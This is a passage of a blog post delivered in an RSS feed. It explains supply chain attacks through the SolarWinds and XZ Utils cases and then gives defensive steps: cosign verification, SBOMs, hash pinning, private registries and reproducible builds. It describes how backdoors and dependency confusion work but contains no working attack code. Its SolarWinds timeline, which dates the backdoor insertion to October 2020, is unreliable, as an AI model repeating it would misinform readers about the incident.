<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Linuxcent</title>
	<atom:link href="https://linuxcent.com/feed/" rel="self" type="application/rss+xml" />
	<link>https://linuxcent.com/</link>
	<description>Infrastructure security, from the kernel up.</description>
	<lastBuildDate>Wed, 13 May 2026 15:36:58 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0</generator>

<image>
	<url>https://linuxcent.com/wp-content/uploads/2026/04/favicon-512x512-1-150x150.png</url>
	<title>Linuxcent</title>
	<link>https://linuxcent.com/</link>
	<width>32</width>
	<height>32</height>
</image> 
<site xmlns="com-wordpress:feed-additions:1">211632295</site>	<item>
		<title>Supply Chain Attacks: From SolarWinds to XZ Utils — Detection and Defense</title>
		<link>https://linuxcent.com/supply-chain-attack-solarwinds-xz-utils/</link>
					<comments>https://linuxcent.com/supply-chain-attack-solarwinds-xz-utils/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Tue, 30 Jun 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[Purple Team]]></category>
		<category><![CDATA[CVE-2024-3094]]></category>
		<category><![CDATA[OWASP]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[SolarWinds]]></category>
		<category><![CDATA[Supply Chain]]></category>
		<category><![CDATA[XZ Utils]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1867</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 14</span> <span class="rt-label rt-postfix">minutes</span></span>Supply chain attacks target trust, not code. SolarWinds to XZ Utils anatomy: how 2 years of social engineering almost shipped a backdoor to every major Linux distro.</p>
<p>The post <a href="https://linuxcent.com/supply-chain-attack-solarwinds-xz-utils/">Supply Chain Attacks: From SolarWinds to XZ Utils — Detection and Defense</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 14</span> <span class="rt-label rt-postfix">minutes</span></span><style>
/* Code blocks: dark theme; the left border colour is overridden per language family below */
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
/* Inline code gets a light chip; code nested in a pre inherits the dark theme instead */
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
/* data-lang is set at runtime by the enhancer script from the code element's language-* class */
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
/* Copy button: hidden until the block is hovered or focused */
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
/* :focus-within keeps the button visible for keyboard users tabbing onto it */
pre:hover .lc-copy-btn,pre:focus-within .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
/* Language badge: purely decorative, so it never intercepts pointer events */
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge,pre:focus-within .lc-lang-badge{opacity:1}
/* Touch devices have no hover state, so always show the controls there */
@media (hover:none){.lc-copy-btn,.lc-lang-badge{opacity:1}}
/* Article tables */
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  // Adds a language badge and a copy-to-clipboard button to every pre element.
  // The window flag makes the script a no-op when it is included more than once
  // on the same page.
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  // Returns the text to copy. Prefers the nested code element; without one, reads a
  // clone of the pre with the injected badge and button removed so their labels
  // never end up on the clipboard.
  function codeText(pre,code){
    if(code)return code.innerText;
    var clone=pre.cloneNode(true);
    clone.querySelectorAll('.lc-copy-btn,.lc-lang-badge').forEach(function(n){n.parentNode.removeChild(n);});
    return clone.textContent;
  }
  // Decorates each pre: sets data-lang from the code element's language-* class,
  // inserts the badge, appends the copy button and wires its click handler.
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang){
        pre.setAttribute('data-lang',lang);
        var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;
        pre.insertBefore(badge,pre.firstChild);
      }
      var btn=document.createElement('button');
      // Explicit type so the button never submits a surrounding form
      btn.type='button';
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=codeText(pre,code);
        // The async Clipboard API is used only when present and in a secure context;
        // everything else goes through the execCommand fallback.
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  // Success feedback: show "Copied!" for two seconds, then restore the label.
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  // Failure feedback: show the failure label for two seconds, then restore it.
  function fail(btn){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  // Fallback copy via a temporary off-screen textarea and execCommand('copy').
  // execCommand reports failure by returning false rather than throwing, so the
  // return value decides which feedback is shown; the textarea is always removed.
  function fb(text,btn){
    var ta=document.createElement('textarea');
    var copied=false;
    try{
      ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';
      document.body.appendChild(ta);ta.select();
      copied=document.execCommand('copy');
    }catch(e){copied=false;}
    finally{if(ta.parentNode)ta.parentNode.removeChild(ta);}
    if(copied){ok(btn);}else{fail(btn);}
  }
  // Run immediately if the DOM is already parsed, otherwise wait for it.
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><a href="/what-is-purple-team-security/">What is purple team security</a> → <a href="/owasp-top-10-cloud-infrastructure/">OWASP Top 10 mapped to cloud infrastructure</a> → <a href="/cloud-security-breaches-2020-2025/">Cloud security breaches 2020–2025</a> → <a href="/broken-access-control-aws/">Broken access control in AWS</a> → <a href="/mfa-fatigue-attack/">MFA fatigue attacks</a> → <a href="/cicd-secrets-exposure/">CI/CD secrets exposure</a> → <a href="/ssrf-cloud-metadata-attack/">SSRF to cloud metadata</a> → <a href="/kubernetes-container-escape-attack-paths/">Kubernetes container escape</a> → <strong>Supply Chain Attacks</strong></p>
<hr />
<h2 id="tldr">TL;DR</h2>
<ul>
<li><strong>Supply chain attack detection</strong> is OWASP A06 + A08: attackers compromise the software build or distribution chain so that legitimate, signed artifacts deliver malicious payloads — standard vulnerability scanning misses this entirely</li>
<li>SolarWinds (December 2020): threat actors compromised the Orion build system in March 2020, waited eight months, inserted the SUNBURST backdoor into a digitally signed update, and reached 18,000+ organizations including the U.S. Treasury, DHS, and DoD</li>
<li>XZ Utils (CVE-2024-3094, March 2024): the &#8220;Jia Tan&#8221; persona spent two years building open-source credibility before inserting a backdoor into release tarballs — the backdoor was not in the git repo, only in the distributed tarball <em>(release tarball = the compressed archive that Linux distributions download to build the package — separate from the git source tree)</em></li>
<li>The XZ backdoor targeted <code class="" data-line="">liblzma</code>, which is linked into <code class="" data-line="">sshd</code> via <code class="" data-line="">libsystemd</code> on affected distros — a compromised SSH daemon on every major Linux distribution was days away from shipping</li>
<li>Detection relied on human observation: Andres Freund noticed a 500ms SSH connection delay during unrelated benchmarking, traced it with <code class="" data-line="">strace</code>, and found <code class="" data-line="">sshd</code> making unexpected calls into <code class="" data-line="">liblzma</code></li>
<li>The structural fix is a pipeline: pin dependencies with hashes + private artifact registry + SBOM generation + image signing with Sigstore/cosign — each layer catches a different attack class</li>
</ul>
<hr />
<blockquote>
<p><strong>OWASP Mapping:</strong> A06 Vulnerable and Outdated Components — compromised upstream dependencies. A08 Software and Data Integrity Failures — build artifacts not signed or verified; release tarball content not validated against source.</p>
</blockquote>
<hr />
<h2 id="the-big-picture">The Big Picture</h2>
<pre><code class="" data-line="">┌──────────────────────────────────────────────────────────────────────────┐
│                  SUPPLY CHAIN ATTACK SURFACE                             │
│                                                                          │
│   SOURCE REPO          BUILD SYSTEM         ARTIFACT REGISTRY           │
│   github.com/org  ──&#x25b6;  CI/CD pipeline  ──&#x25b6;  container registry / PyPI  │
│        │                    │                      │                     │
│        │                    │                      │                     │
│   ATTACK POINT 1:      ATTACK POINT 2:       ATTACK POINT 3:            │
│   Social engineer      Compromise the        Typosquatting /             │
│   maintainer trust     build host            dependency confusion        │
│   (XZ model)           (SolarWinds model)    (public registry model)    │
│        │                    │                      │                     │
│        └────────────────────┴──────────────────────┘                    │
│                             │                                            │
│                    COMPROMISED ARTIFACT                                  │
│             (signed, valid, ships with legitimate release)               │
│                             │                                            │
│                             ▼                                            │
│        PRODUCTION SYSTEMS (18,000 orgs / every major Linux distro)      │
│                                                                          │
│   ═══════════════════════════════════════════════════════════════        │
│   DETECTION PIPELINE                                                     │
│   Hash pinning + SBOM + Sigstore verify + tarball ≠ git diff check      │
│   Each layer catches a different attack class                            │
└──────────────────────────────────────────────────────────────────────────┘
</code></pre>
<p><strong>Supply chain attack detection</strong> is hard because the artifact being delivered is legitimate by every traditional check: it is signed by the vendor, it passes antivirus, it resolves from the correct registry. The attack happened before the artifact was packaged, inside the trust chain you already approved. SolarWinds and XZ Utils are not anomalies — they are the template.</p>
<hr />
<h2 id="two-incidents-same-attack-surface">Two Incidents — Same Attack Surface</h2>
<h3 id="solarwinds-december-2020">SolarWinds (December 2020)</h3>
<p>The SolarWinds compromise is the definitive build-system attack. The timeline:</p>
<pre><code class="" data-line="">March 2020       Threat actor (UNC2452 / Cozy Bear) gains access to
                 SolarWinds build environment

October 2020     SUNBURST backdoor code inserted into SolarWinds Orion
                 build process — not into the source repository

October 2020     Orion 2019.4 through 2020.2.1 builds produced with
                 SUNBURST included — binaries digitally signed by
                 SolarWinds with their valid code-signing certificate

October–         SUNBURST distributed to ~18,000 customers via the
December 2020    legitimate Orion software update mechanism

December 2020    FireEye detects SUNBURST while investigating their own
                 breach — reports to SolarWinds and CISA
</code></pre>
<p><strong>What made detection almost impossible:</strong></p>
<p>The compiled binary passed every integrity check a customer would run. It was signed with SolarWinds&#8217; legitimate certificate. It installed via the normal software update channel. The SUNBURST code itself was designed for low observability: it lay dormant for 12–14 days after installation, used legitimate SolarWinds API patterns to blend with normal Orion traffic, and used legitimate cloud infrastructure (avsvmcloud.com, which resolved to valid cloud provider IPs) for command-and-control.</p>
<p>The C2 communication was disguised as standard Orion telemetry. Exfiltration was slow — the attackers were not bulk-extracting data, they were selecting targets and moving laterally only inside high-value organizations.</p>
<p><strong>The attack vector was the build system, not source code.</strong> SolarWinds source repositories did not contain SUNBURST. The attacker modified the compiled output at build time. A code review of the SolarWinds source would have found nothing.</p>
<hr />
<h3 id="xz-utils-cve-2024-3094-march-2024">XZ Utils (CVE-2024-3094, March 2024)</h3>
<p>The XZ Utils compromise is more instructive because it was social engineering at the package maintainer level, caught before it shipped widely — and the catch was accidental.</p>
<p><strong>Timeline:</strong></p>
<pre><code class="" data-line="">November 2021    GitHub user &quot;Jia Tan&quot; (JiaT75) makes first commit to
                 xz-utils repository

2022–2023        Jia Tan steadily contributes quality patches to xz-utils,
                 builds trust with maintainer Lasse Collin, is eventually
                 granted commit access

Early 2024       Jia Tan accelerates commit activity, coordinates social
                 pressure on Lasse Collin from other fake personas to
                 push releases faster

February 2024    Jia Tan releases xz 5.6.0 — backdoor code inserted in
                 the release tarball build process (not in git commits)

March 9, 2024    xz 5.6.1 released with minor obfuscation changes

March 28–29,     Andres Freund (PostgreSQL/Microsoft engineer) notices
2024             500ms SSH connection delay on his Debian sid machine
                 while running unrelated Valgrind benchmarks

March 29, 2024   Freund traces the delay with strace, finds sshd making
                 unexpected calls into liblzma, reports to oss-security
                 mailing list

March 30, 2024   CISA advisory published. Fedora 40 beta, Debian unstable,
                 openSUSE Tumbleweed had all shipped the affected version.
                 Ubuntu 24.04 LTS was in freeze and had it staged.
</code></pre>
<p><strong>What was backdoored and how:</strong></p>
<p><code class="" data-line="">xz-utils</code> provides the <code class="" data-line="">liblzma</code> compression library. On systemd-based Linux distributions, <code class="" data-line="">sshd</code> links against <code class="" data-line="">libsystemd</code>, which links against <code class="" data-line="">liblzma</code>. The backdoor hooked into <code class="" data-line="">sshd</code>&#8217;s RSA key processing — specifically <code class="" data-line="">RSA_public_decrypt</code> — to allow authentication bypass using a specific attacker-controlled private key.</p>
<p>The backdoor was not in the git repository. It was injected during the tarball release process via obfuscated test files in the repository that were assembled and compiled during the build. Comparing the released tarball to the git tree reveals extra files and code that do not appear in any git commit:</p>
<pre><code class="" data-line="">xz --version
# 5.6.0 or 5.6.1 = affected; 5.4.x = safe

# How Andres Freund found it
# He was running sshd benchmarks and noticed unexpected latency
strace -p $(pgrep sshd) 2&gt;&amp;1 | head -20
# Saw unexpected calls into liblzma that should not be there
# Normal sshd does not call into liblzma at all

# Verify tarball vs git diff (the forensic check)
# If you have both the tarball and git source:
tar xf xz-5.6.1.tar.gz
# Clone the matching release tag — diffing against the default branch would
# bury the signal under unrelated later commits
git clone --depth 1 --branch v5.6.1 https://github.com/tukaani-project/xz.git xz-git
# Skip git's own metadata directory, which never exists in a tarball
diff -r --exclude=.git xz-5.6.1/ xz-git/
# Extra files in the tarball that don&#039;t appear in git = compromise indicator
# (autotools-generated files such as configure are expected; review everything else)
</code></pre>
<p><strong>What makes this attack class so dangerous:</strong></p>
<p>The actor ran a multi-year operation. Two years of legitimate contributions, relationship-building with maintainers, and social pressure coordination across multiple fake personas. The code quality was good — Jia Tan&#8217;s legitimate commits improved xz-utils. The backdoor code was technically sophisticated enough that it took days of analysis to fully reverse-engineer after Freund&#8217;s discovery.</p>
<hr />
<h2 id="red-phase-how-supply-chain-attacks-work-in-practice">Red Phase: How Supply Chain Attacks Work in Practice</h2>
<p>There are three distinct attack surfaces. They require different defenses and catch different attack classes.</p>
<h3 id="1-build-system-compromise-solarwinds-model">1. Build System Compromise (SolarWinds Model)</h3>
<p>The attacker gains access to the CI/CD or build host and modifies compiled artifacts. The source code is clean. Git history is clean. Only the build output is poisoned.</p>
<p><strong>What makes it hard to catch:</strong> legitimate signing certificate, normal distribution channel, artifact passes all integrity checks that consumers run.</p>
<p><strong>Simulation (safe to run in a test environment):</strong></p>
<pre><code class="" data-line=""># Understand your build artifact&#039;s provenance
# Can you trace a production binary back to a specific source commit?

# For a Docker image: inspect build metadata
docker inspect your-org/your-image:latest | \
  jq &#039;.[0].Config.Labels&#039;
# Look for: org.opencontainers.image.revision (git SHA)
#           org.opencontainers.image.source (repo URL)
# If these labels are absent, you cannot verify what source built this image

# For a Go binary: read embedded build info
go version -m /path/to/binary
# Shows: Go version, module path, dependencies with versions and hashes
# If -trimpath was used during build, some info may be stripped

# Check if a container image was built from a known CI workflow
# (assumes SLSA provenance attestation is present)
# Pin the signer identity to your own repository: a catch-all regexp such as
# &quot;.*&quot; would accept an attestation signed by ANY GitHub Actions workflow
cosign verify-attestation \
  --type slsaprovenance \
  --certificate-identity-regexp=&quot;^https://github\.com/your-org/your-repo/&quot; \
  --certificate-oidc-issuer=&quot;https://token.actions.githubusercontent.com&quot; \
  your-org/your-image:latest | \
  jq -r &#039;.payload | @base64d | fromjson | .predicate.buildType&#039;
</code></pre>
<h3 id="2-dependency-hijacking-typosquatting-and-dependency-confusion">2. Dependency Hijacking: Typosquatting and Dependency Confusion</h3>
<p><strong>Typosquatting:</strong> a malicious package on PyPI/npm with a name close to a popular package (<code class="" data-line="">requets</code> vs <code class="" data-line="">requests</code>, <code class="" data-line="">djano</code> vs <code class="" data-line="">django</code>). Developers with a typo in their <code class="" data-line="">requirements.txt</code> install the malicious package.</p>
<p><strong>Dependency confusion:</strong> a private internal package (<code class="" data-line="">mycompany-utils</code>) has the same name as a package an attacker uploads to the public registry with a higher version number. Package managers that check public registries before private ones will resolve the public (malicious) version.</p>
<pre><code class="" data-line=""># Test for dependency confusion: can your private package names be
# resolved from the public registry?
# Do this in a throwaway environment, NOT production

# For Python: check if your internal package name exists on PyPI
pip index versions your-internal-package-name 2&gt;/dev/null
# If it returns versions and you didn&#039;t publish it there = confusion risk

# For npm: check if your scoped package exists on the public registry
npm view @your-scope/your-package version 2&gt;/dev/null
# An unscoped internal package with a public registry hit = confusion risk

# For pip: audit your requirements for known-bad packages
pip-audit --requirement requirements.txt
# pip-audit checks against the OSV vulnerability database
# Install: pip install pip-audit

# For npm: audit for both vulnerabilities and signature issues
npm audit
npm audit signatures
# &#039;npm audit signatures&#039; verifies that packages in node_modules were
# signed with registry-issued keys — catches tampered downloads
</code></pre>
<h3 id="3-maintainer-compromise-and-social-engineering-xz-model">3. Maintainer Compromise and Social Engineering (XZ Model)</h3>
<p>The hardest attack class to detect from the outside. A trusted maintainer is either compromised or is the attacker. Their commits are signed, their track record is legitimate, the package comes from the canonical repository.</p>
<p><strong>What you can check:</strong></p>
<pre><code class="" data-line=""># Verify a PyPI package hash matches what&#039;s listed in the index
# The hash listed on PyPI is set at upload time — if the file was
# replaced after upload, the hash would change (PyPI prevents this,
# but private/mirror registries may not)
pip download requests==2.31.0 --no-deps --dest /tmp/pkg-check/
sha256sum /tmp/pkg-check/requests-2.31.0-py3-none-any.whl
# Compare to the hash shown at pypi.org/project/requests/2.31.0/#files

# Check npm package signatures (post-XZ hygiene)
npm audit signatures
# Output shows: verified (good), missing (not signed), invalid (tampered)

# For containers: verify Sigstore signature
# The identity regexp must name YOUR repository — &quot;.*&quot; would match any
# workflow on GitHub and make the check meaningless
cosign verify \
  --certificate-identity-regexp=&quot;^https://github\.com/your-org/your-repo/&quot; \
  --certificate-oidc-issuer=&quot;https://token.actions.githubusercontent.com&quot; \
  ghcr.io/your-org/your-image:latest
# If this fails: the image was not built by the expected GitHub Actions workflow
</code></pre>
<hr />
<h2 id="blue-phase-detection">Blue Phase: Detection</h2>
<h3 id="slsa-what-level-your-pipeline-should-be-at">SLSA: What Level Your Pipeline Should Be At</h3>
<p>SLSA (Supply chain Levels for Software Artifacts) is a framework for build pipeline integrity. Four levels:</p>
<pre><code class="" data-line="">SLSA Level 1  Build process is scripted/automated, produces provenance
              Most teams can reach this today
              Catches: accidental modifications, basic auditability

SLSA Level 2  Build runs on a hosted, version-controlled build platform
              (GitHub Actions, GitLab CI) — provenance is signed by the
              build platform, not just the developer
              Catches: developer workstation compromise

SLSA Level 3  Hermetic builds — the build environment is isolated from
              the network, cannot pull external resources at build time
              Provenance is non-forgeable
              Catches: build-time dependency injection, most CI/CD attacks

SLSA Level 4  (deprecated in SLSA v1.0, merged into L3)

Most teams should target SLSA Level 2 now, Level 3 within 6 months.
Level 3 is where SolarWinds-class attacks become detectable.
</code></pre>
<h3 id="container-image-signing-with-sigstorecosign">Container Image Signing with Sigstore/cosign</h3>
<pre><code class="" data-line=""># Sign a container image after build (in CI, using OIDC — no stored key)
# This runs inside GitHub Actions after the docker push step
cosign sign \
  --yes \
  ghcr.io/your-org/your-image:${GITHUB_SHA}
# cosign uses the GitHub Actions OIDC token to sign — no private key needed
# The signature is stored in the registry alongside the image

# Verify the signature and check the certificate claims
cosign verify \
  --certificate-identity=&quot;https://github.com/your-org/your-repo/.github/workflows/build.yml@refs/heads/main&quot; \
  --certificate-oidc-issuer=&quot;https://token.actions.githubusercontent.com&quot; \
  ghcr.io/your-org/your-image:latest | \
  jq &#039;.[0] | {
    issuer: .optional.Issuer,
    workflow: .optional.BuildSignerURI,
    repo: .optional.SourceRepositoryURI,
    ref: .optional.SourceRepositoryRef
  }&#039;
# A passing verification means:
# - Image was built by a specific GitHub Actions workflow
# - In a specific repository, on a specific branch
# - At a specific time (cert has a 10-minute TTL)
</code></pre>
<h3 id="sbom-generation-and-vulnerability-scanning">SBOM Generation and Vulnerability Scanning</h3>
<p>An SBOM (Software Bill of Materials) enumerates every component in a software artifact. Without an SBOM, you cannot answer &#8220;are we affected by the XZ backdoor?&#8221; across your fleet in under an hour.</p>
<pre><code class="" data-line=""># Generate an SBOM for a container image using syft
syft your-org/your-image:latest -o cyclonedx-json &gt; sbom.json
# syft walks the image layers and catalogs every package,
# including OS packages (rpm/deb), language packages (pip/npm/go),
# and their versions

# Inspect what syft found
cat sbom.json | jq &#039;.components[] | select(.name == &quot;xz-libs&quot;) | {name, version, purl}&#039;
# Example output:
# {
#   &quot;name&quot;: &quot;xz-libs&quot;,
#   &quot;version&quot;: &quot;5.4.4-1.el9&quot;,    ← 5.4.x = safe; 5.6.0/5.6.1 = backdoored
#   &quot;purl&quot;: &quot;pkg:rpm/redhat/xz-libs@5.4.4-1.el9?arch=x86_64&quot;
# }

# Scan the SBOM for known vulnerabilities
grype sbom:./sbom.json
# grype checks each component against Grype&#039;s vulnerability database
# (CVE, GHSA, OSV) — would have flagged CVE-2024-3094 once published

# Automate: generate SBOM and scan in CI, fail build if critical CVEs found
grype sbom:./sbom.json --fail-on critical
</code></pre>
<h3 id="build-provenance-with-github-actions-slsa-level-23">Build Provenance with GitHub Actions (SLSA Level 2/3)</h3>
<pre><code class="" data-line=""># .github/workflows/build.yml
# Adds SLSA provenance attestation to every release artifact
name: Build and attest

on:
  push:
    tags: [&quot;v*&quot;]

permissions:
  contents: write
  packages: write       # Required to push the image to ghcr.io
  id-token: write       # Required for OIDC signing
  attestations: write   # Required for GitHub attestation API

jobs:
  build:
    runs-on: ubuntu-latest
    outputs:
      image-digest: ${{ steps.push.outputs.digest }}
    steps:
      - uses: actions/checkout@v4

      # Without a registry login the push step below is rejected by ghcr.io
      - name: Log in to GitHub Container Registry
        uses: docker/login-action@v3
        with:
          registry: ghcr.io
          username: ${{ github.actor }}
          password: ${{ secrets.GITHUB_TOKEN }}

      - name: Build and push container image
        id: push
        uses: docker/build-push-action@v5
        with:
          push: true
          tags: ghcr.io/${{ github.repository }}:${{ github.ref_name }}

      - name: Generate SLSA provenance attestation
        uses: actions/attest-build-provenance@v1
        with:
          subject-name: ghcr.io/${{ github.repository }}
          subject-digest: ${{ steps.push.outputs.digest }}
          push-to-registry: true
          # This generates a signed SLSA provenance statement that records:
          # - Which workflow built this artifact
          # - The git SHA it was built from
          # - The trigger event
          # Stored alongside the image in the registry
</code></pre>
<pre><code class="" data-line=""># Verify the attestation against an image
gh attestation verify \
  oci://ghcr.io/your-org/your-image:latest \
  --owner your-org
# Passes: image provenance is traceable to a specific workflow run
# Fails: image was built and pushed outside any attested workflow
</code></pre>
<h3 id="what-anomaly-detection-catches">What Anomaly Detection Catches</h3>
<p>Sigstore and SBOM scanning catch known-bad artifacts. Anomaly detection catches behavior that hasn&#8217;t been classified yet:</p>
<ul>
<li><strong>Unexpected external connections during build:</strong> a hermetic build should make zero network calls after dependency fetch. Any egress during the build phase is a signal — a compromised build tool phoning home, a dependency pulling a secondary payload at install time</li>
<li><strong>Artifact hash drift:</strong> if the same source commit produces different binary output on two consecutive builds, the build environment is non-deterministic at best, compromised at worst. Reproducible builds produce identical byte-for-byte output from identical inputs — hash drift indicates something in the build environment changed</li>
<li><strong>New dependency additions without PR:</strong> any dependency that appears in a build artifact but was not added via a reviewed pull request is an anomaly. SBOMs make this comparison possible; without them it is invisible</li>
</ul>
<pre><code class="" data-line=""># Check for unexpected network connections during a build
# Run this on the build host during a CI job
# ss prints abbreviated state names (ESTAB, SYN-SENT), not the netstat-style
# ESTABLISHED / SYN_SENT, so match on the names ss actually emits
ss -tnp | grep -E &quot;(ESTAB|SYN-SENT)&quot;
# Any connection to an IP outside your artifact registry and SCM = investigate

# Compare artifact hashes across two builds of the same commit
# (tests build reproducibility)
docker pull ghcr.io/your-org/your-image@sha256:&lt;first-build-digest&gt;
docker pull ghcr.io/your-org/your-image@sha256:&lt;second-build-digest&gt;
# If the digests differ for the same source commit, investigate
</code></pre>
<hr />
<h2 id="purple-phase-structural-fixes">Purple Phase: Structural Fixes</h2>
<h3 id="1-pin-dependencies-with-hashes-not-just-versions">1. Pin Dependencies with Hashes — Not Just Versions</h3>
<p>Version pinning (<code class="" data-line="">requests==2.31.0</code>) pins the version number. The package maintainer can yank and re-upload that version with different content on some registries. Hash pinning locks the exact file bytes:</p>
<pre><code class="" data-line=""># requirements.txt — hash-pinned
requests==2.31.0 \
    --hash=sha256:58cd2187423839e4e2d07f6f16c9cd680e74d6066237a4e1e88f06fc4a3e2e56 \
    --hash=sha256:942c5a758f98d790eaed1a29cb6eefc7ffb0d1cf7af05c3d2791656dbd6ad1e1
# Two hashes because the package ships both a wheel and a source tarball
# pip verifies the downloaded file matches one of these hashes before installing

# Generate hash-pinned requirements from a working environment
pip-compile --generate-hashes requirements.in --output-file requirements.txt
# pip-compile resolves the full dependency tree and writes pinned+hashed output
</code></pre>
<p>For containers, pin base images by digest, not by tag:</p>
<pre><code class="" data-line=""># Vulnerable: mutable tag
FROM python:3.11-slim

# Secure: pinned digest
FROM python:3.11-slim@sha256:6a37af1bde8be89040f70b9e93f2f61b5f14e99d7e49f9ea3dc7ded2e1c82f7b
# The digest is immutable — this exact image layer will always be fetched,
# regardless of what the 3.11-slim tag points to in the future
</code></pre>
<h3 id="2-private-artifact-registry-no-direct-pypi-or-npm-in-production-ci">2. Private Artifact Registry — No Direct PyPI or npm in Production CI</h3>
<p>A private registry (Artifactory, Nexus, AWS CodeArtifact, Google Artifact Registry) proxies upstream registries and caches approved packages. Benefits:</p>
<ul>
<li><strong>Dependency confusion protection:</strong> your CI resolves <code class="" data-line="">mycompany-utils</code> from your private registry first, never from public PyPI</li>
<li><strong>Availability independence:</strong> a PyPI outage does not break your builds</li>
<li><strong>Audit trail:</strong> every package version pulled in every build is logged</li>
<li><strong>Policy enforcement:</strong> you can block packages with unacceptable licenses or CVE scores</li>
</ul>
<pre><code class="" data-line=""># Configure pip to use a private registry proxy exclusively
# In ci/pip.conf or as environment variable
export PIP_INDEX_URL=&quot;https://your-artifactory.company.com/artifactory/api/pypi/pypi-virtual/simple/&quot;
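# Do not set PIP_TRUSTED_HOST — it disables TLS certificate verification for that host.
# If the registry uses an internal CA, point pip at the CA bundle instead:
export PIP_CERT=&quot;/etc/ssl/certs/company-ca.pem&quot;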
# No direct PyPI access — all packages go through your registry proxy

# For npm: configure registry in .npmrc
echo &quot;registry=https://your-artifactory.company.com/artifactory/api/npm/npm-virtual/&quot; &gt; .npmrc
echo &quot;always-auth=true&quot; &gt;&gt; .npmrc
</code></pre>
<h3 id="3-reproducible-builds-same-input-produces-same-output">3. Reproducible Builds — Same Input Produces Same Output</h3>
<p>Reproducible builds allow independent verification: a third party can take the same source and build environment and produce a byte-for-byte identical artifact. If the published artifact does not match, something changed between source and distribution.</p>
<p>This is exactly how the XZ tarball compromise would have been caught earlier with proper tooling: the release tarball did not match what would be produced by checking out the git tag and running the build.</p>
<pre><code class="" data-line=""># For Go: builds are reproducible by default in Go 1.13+
# Verify by building twice and comparing
go build -o binary-1 ./cmd/...
go build -o binary-2 ./cmd/...
sha256sum binary-1 binary-2
# Identical hashes = reproducible

# For containers with BuildKit: use --no-cache and compare digests
DOCKER_BUILDKIT=1 docker build --no-cache -t test-1 .
DOCKER_BUILDKIT=1 docker build --no-cache -t test-2 .
docker inspect test-1 test-2 | jq &#039;.[].Id&#039;
# Identical IDs = reproducible build environment

# SOURCE_DATE_EPOCH forces reproducible timestamps (common reproducibility blocker)
export SOURCE_DATE_EPOCH=$(git log -1 --format=%ct)
make  # or whatever your build command is
</code></pre>
<h3 id="4-separate-build-and-release-environments">4. Separate Build and Release Environments</h3>
<p>SolarWinds built and signed in the same compromised environment. The build environment had signing keys. An attacker who owns the build host owns the signing operation.</p>
<pre><code class="" data-line="">INSECURE:                           SECURE:

Build host ──&#x25b6; compile              Build host ──&#x25b6; compile
           ──&#x25b6; sign artifact                   ──&#x25b6; output unsigned artifact
           ──&#x25b6; publish                                    │
                                                          ▼
                                    Separate signing host (air-gapped or HSM)
                                                    ──&#x25b6; verify artifact hash
